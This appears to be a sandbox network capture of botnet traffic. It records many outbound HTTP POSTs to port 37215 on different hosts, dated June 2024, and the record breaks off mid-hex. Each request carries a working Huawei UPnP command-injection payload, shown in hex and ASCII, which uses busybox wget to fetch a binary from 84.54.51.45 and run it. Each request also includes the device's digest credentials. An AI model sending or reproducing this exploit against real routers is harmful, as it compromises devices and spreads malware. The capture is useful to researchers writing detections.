                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            780192.168.2.154499241.138.209.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740020990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            781192.168.2.153960241.135.52.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740056038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            782192.168.2.155468441.120.106.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740108967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            783192.168.2.153953641.199.99.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740117073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            784192.168.2.153566441.52.241.8537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740140915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            785192.168.2.154963241.234.31.2037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740161896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            786192.168.2.155849441.209.131.8537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740183115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            787192.168.2.153747441.131.195.12237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740200996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            788192.168.2.155910641.85.41.18937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740226984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            789192.168.2.154561841.224.143.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740261078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 